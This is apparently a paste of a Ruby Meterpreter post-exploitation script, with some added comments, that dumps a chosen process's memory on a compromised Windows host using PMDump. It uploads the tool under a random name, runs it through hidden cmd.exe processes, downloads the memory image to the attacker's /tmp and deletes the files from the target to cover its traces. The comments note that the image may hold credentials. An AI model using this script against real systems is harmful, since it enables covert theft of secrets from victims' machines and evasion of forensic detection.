
redmeat_uk

  1. #!/usr/bin/env ruby
  2.  
  3. # Meterpreter script for dumping target memory for a particular process using Arne Vidstrom's PMDump tool - http://ntsecurity.nu/toolbox/pmdump/
  4.  
  5. # This is a modified version of memdump.rb a script written by Carlos Perez (Dark Operator) - http://www.darkoperator.com/blog/2009/3/10/meterpreter-memory-dump-script.html
  6.  
  7. # modified by: redmeat_uk@hotmail.com
  8. # date: 26/09/2009
  9.  
  10. require 'readline'
  11.  
  # Meterpreter session the script operates on. `client` is not defined in this
  # file; presumably the Meterpreter script environment supplies it.
  session = client

  # Options understood by the script: -h prints usage, -t takes a value.
  @@exec_opts = Rex::Parser::Arguments.new(
    "-h" => [false, "Help menu."],
    "-t" => [true, "Change the timeout default 5min. Specify timeout in seconds"]
  )

  # Expand %TEMP% on the target; the uploaded tool and the memory image are
  # both written to this directory.
  tmp = session.fs.file.expand_path("%TEMP%")

  # Zero-padded five-digit random number used as the image file name.
  # rand is not a cryptographic source; the name only needs to avoid clashes.
  imgname = format("%.5d", rand(100000))

  # Default response timeout for session commands, in seconds (5 minutes).
  timeoutsec = 300
  24.  
  25. #---------------------------------------------------------------------------------------------------------
  26. #Dumping memory image
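  # Runs Arne Vidstrom's pmdump against one process on the Meterpreter target
  # and copies the resulting image back to the operator's machine.
  #
  # Steps, in order: upload pmdump.exe from the framework's data directory to
  # +tmp+ under a random five-digit name, print the target's process list, ask
  # the operator for a PID, dump that process to +tmp+\+imgname+, download the
  # image to /tmp/pmdump-<imgname>, then delete both files from the target.
  #
  # Observable on the target (useful when reviewing what a run leaves behind):
  # a five-digit .exe and a five-digit extensionless file written to +tmp+,
  # and several cmd.exe /c child processes started with the Hidden option.
  #
  # The downloaded image is a raw copy of process memory and may hold
  # credentials or other secrets; treat it as sensitive engagement data. Its
  # permissions under /tmp depend on the operator's umask -- verify.
  #
  # @param session    Meterpreter client used for file and process calls
  # @param tmp        target-side directory (the expanded %TEMP%)
  # @param imgname    file name of the memory image inside +tmp+
  # @param timeoutsec response timeout in seconds; coerced with to_i
  # @return not meaningful; the method is called for its side effects
  def memdump(session,tmp,imgname,timeoutsec)
    pmexe = File.join(Msf::Config.install_root, "data", "pmdump.exe")
    pmscramble = sprintf("%.5d",rand(100000))
    remote_tool = "#{tmp}\\#{pmscramble}.exe"
    remote_image = "#{tmp}\\#{imgname}"

    print_status("Uploading pmdump for dumping memory of a process....")
    begin
      session.fs.file.upload_file(remote_tool,"#{pmexe}")
      print_status("pmdump uploaded as #{remote_tool}")
    # ::Exception is kept from the original script; narrowing it could change
    # which framework errors are reported here.
    rescue ::Exception => e
      print_status("The following Error was encountered: #{e.class} #{e}")
      # Nothing was uploaded, so none of the later steps can work.
      return
    end

    # A value passed with -t may still be a String; only apply a usable number.
    secs = timeoutsec.to_i
    session.response_timeout = secs if secs > 0

    pid = nil
    print_status("Process list...")
    begin
      r = session.sys.process.execute("cmd.exe /c #{remote_tool} -list", nil, {'Hidden' => 'true','Channelized' => true})

      while(d = r.channel.read)
        print_status("#{d}")
      end
      r.channel.close
      r.close

      line = Readline::readline('Please enter PID: ')
      Readline::HISTORY.push(line) if line
      # The PID is interpolated into a cmd.exe command line below, so accept
      # decimal digits only instead of passing arbitrary text to the shell.
      candidate = line.to_s.strip
      pid = candidate if candidate =~ /\A\d+\z/
    rescue ::Exception => e
      print_status("The following Error was encountered: #{e.class} #{e}")
    end

    if pid
      print_status("Dumping memory for process id #{pid}")
      begin
        n = session.sys.process.execute("cmd.exe /c #{remote_tool} #{pid} #{remote_image}", nil, {'Hidden' => 'true','Channelized' => true})
        # Drain the tool's output; the original collected it but never used it.
        while n.channel.read
        end
        n.channel.close
        n.close

        print_status("Finished dumping process's memory")
      rescue ::Exception => e
        print_status("The following Error was encountered: #{e.class} #{e}")
      end
      print_status("Downloading memory dump for process id #{pid} to /tmp/pmdump-#{imgname}")

      # First argument is the local destination, second the file on the target
      # (argument order as used by upload_file above -- confirm against the API).
      session.fs.file.download_file("/tmp/pmdump-#{imgname}", remote_image)
    else
      print_status("No valid numeric PID was entered; skipping the dump")
    end

    # The result of the del commands is not checked, so the messages below
    # report that deletion was requested, not that it succeeded.
    print_status("Deleting pmdump.exe from target...")
    session.sys.process.execute("cmd.exe /c del #{remote_tool}", nil, {'Hidden' => 'true'})
    print_status("pmdump.exe deleted")
    print_status("Deleting left over files...")
    session.sys.process.execute("cmd.exe /c del #{remote_image}", nil, {'Hidden' => 'true'})
    print_status("process memory dump image on target deleted")
  end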
  83.  
  84. ################## MAIN ##################
  85. # Parsing of Option
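  # Set to 1 when -h was given, in which case only the usage text is printed.
  hlp = 0
  @@exec_opts.parse(args) { |opt, idx, val|
    case opt
    when "-t"
      # The option value is presumably a String taken from the script
      # arguments; convert it so the session timeout receives a number, and
      # keep the default when the value is missing or not a positive integer.
      secs = val.to_i
      if secs > 0
        timeoutsec = secs
      else
        print_status("Ignoring invalid timeout #{val.inspect}; using #{timeoutsec} seconds")
      end
    when "-h"
      hlp = 1
      print(
        "Process Memory Dumper Meterpreter Script\n" +
        @@exec_opts.usage
      )
      break
    end
  }

  # Run the dump unless help was requested.
  if hlp == 0
    print_status("Running Meterpreter Process Memory Dump Script.....")
    memdump(session,tmp,imgname,timeoutsec)
  end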